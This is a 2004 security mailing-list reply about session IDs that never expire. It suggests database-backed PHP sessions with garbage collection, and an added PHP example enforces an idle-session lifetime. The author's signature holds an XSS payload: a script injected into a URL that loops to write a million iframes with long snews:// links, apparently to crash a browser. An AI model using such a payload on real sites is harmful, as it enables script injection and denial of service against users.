WebApp Sec mailing list archives

Re: session id abuse


From: hans <hans () e35203 upc-e chello nl>
Date: Sat, 14 Feb 2004 01:17:22 +0100 (CET)



On Fri, 13 Feb 2004, Johnny GoLightly wrote:

> User requires access to a web application for a long period of time with inactivity. Therefore assume that sessionID
> never expires.

Sessions can be expired. When, for example, you use PHP you could set
the session handler to store the info in a database server. With the
garbage collector you would be able to delete this information.

If you are not deleting it, it would only be readable by the session
owner.

Hans
-- 
begin  http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
        document.write("\<iframe
        src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; + i +
        "\"\>\<\/iframe>"); } document.refresh; </script>
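The PHP setup Hans describes, written out as an added example (not code from the original post or from any project): a custom session handler that stores session data in a database and whose gc() method deletes sessions that have been idle longer than the configured lifetime. It uses an in-memory SQLite database through PDO so it runs stand-alone; the table and column names, the session-id value and the 30-minute lifetime are assumptions for the illustration.

```php
<?php
// Added example: database-backed PHP session store with garbage collection.
// Not from the original post. Table/column names and sample values are assumed.

final class DbSessionHandler implements SessionHandlerInterface
{
    private PDO $db;
    private int $maxLifetime;

    public function __construct(PDO $db, int $maxLifetime)
    {
        $this->db = $db;
        $this->maxLifetime = $maxLifetime;
        // Assumed schema: one row per session, last_seen is a Unix timestamp.
        $this->db->exec(
            'CREATE TABLE IF NOT EXISTS sessions (
                id TEXT PRIMARY KEY,
                data BLOB NOT NULL,
                last_seen INTEGER NOT NULL
            )'
        );
    }

    public function open(string $path, string $name): bool { return true; }
    public function close(): bool { return true; }

    public function read(string $id): string|false
    {
        // Enforce the lifetime on read as well as in gc(): PHP runs the session
        // garbage collector only with probability gc_probability/gc_divisor per
        // request, so an expired row can still be in the table when the next
        // request for that id arrives.
        $stmt = $this->db->prepare(
            'SELECT data FROM sessions WHERE id = :id AND last_seen > :cutoff'
        );
        $stmt->execute([':id' => $id, ':cutoff' => time() - $this->maxLifetime]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? '' : $row['data'];
    }

    public function write(string $id, string $data): bool
    {
        // Upsert and refresh last_seen so activity extends the session.
        $stmt = $this->db->prepare(
            'INSERT INTO sessions (id, data, last_seen) VALUES (:id, :data, :now)
             ON CONFLICT(id) DO UPDATE SET data = excluded.data, last_seen = excluded.last_seen'
        );
        return $stmt->execute([':id' => $id, ':data' => $data, ':now' => time()]);
    }

    public function destroy(string $id): bool
    {
        $stmt = $this->db->prepare('DELETE FROM sessions WHERE id = :id');
        return $stmt->execute([':id' => $id]);
    }

    public function gc(int $max_lifetime): int|false
    {
        // Called by PHP's session garbage collector with session.gc_maxlifetime;
        // deletes every session idle for longer than that.
        $stmt = $this->db->prepare('DELETE FROM sessions WHERE last_seen <= :cutoff');
        $stmt->execute([':cutoff' => time() - $max_lifetime]);
        return $stmt->rowCount();
    }
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$lifetime = 1800; // assumed: 30 minutes of inactivity
$handler = new DbSessionHandler($db, $lifetime);

// Register the handler; session_start() now reads and writes through the database.
session_set_save_handler($handler, true);
ini_set('session.gc_maxlifetime', (string) $lifetime);

// Exercise the handler directly (no browser needed) to show expiry.
$handler->write('abc123', 'user|s:5:"alice";');      // assumed sample session
echo $handler->read('abc123'), "\n";                 // fresh: data is returned

// Simulate a session that has sat idle past the lifetime, then run GC.
$db->exec('UPDATE sessions SET last_seen = last_seen - ' . ($lifetime + 1));
echo var_export($handler->read('abc123'), true), "\n"; // '' : rejected on read
echo $handler->gc($lifetime), "\n";                    // 1  : row removed by the collector
```

The read-side cutoff is the part worth keeping even if gc() is rarely triggered: without it, a session id that has not been collected yet remains usable by whoever presents it, which is the abuse scenario the thread is about.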

